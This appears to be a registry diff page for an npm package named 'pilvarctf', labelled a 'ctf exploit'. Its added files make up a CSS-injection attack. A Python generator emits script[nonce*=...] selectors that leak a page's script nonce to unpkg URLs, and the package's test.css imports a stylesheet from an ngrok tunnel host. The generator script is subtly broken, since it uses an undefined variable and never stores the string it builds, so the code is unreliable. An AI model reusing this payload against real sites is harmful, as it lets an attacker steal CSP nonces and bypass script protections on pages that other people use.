pilvarctf 1.0.14

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of pilvarctf might be problematic. Click here for more details.

package/aylmao ADDED
File without changes
package/createfiles.py ADDED
@@ -0,0 +1,9 @@
1
+
2
+
3
+ charset = "abcdefghijklmnopqrstuvwxyz0123456789"
4
+
5
+ for i in range(3,17):
6
+ for c1 in charset:
7
+ for c2 in charset:
8
+ dual = c1 + c2
9
+ "script[nonce*='"+dual+"']{background-image:url('https://unpkg.com/pilvarctf@"+ver+"/leaks/"+str(i)+"')}"
package/nice ADDED
File without changes
package/notes ADDED
@@ -0,0 +1,3 @@
1
+ <style>
2
+ @import url('https://unpkg.com/pilvarctf@1.0.7/test.css')
3
+ </style>
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "pilvarctf",
3
+ "version": "1.0.14",
4
+ "description": "ctf exploit",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
11
+ }
package/test.css ADDED
@@ -0,0 +1 @@
1
+ @import url('https://87e2-211-210-76-10.ngrok-free.app/get.css?i=1');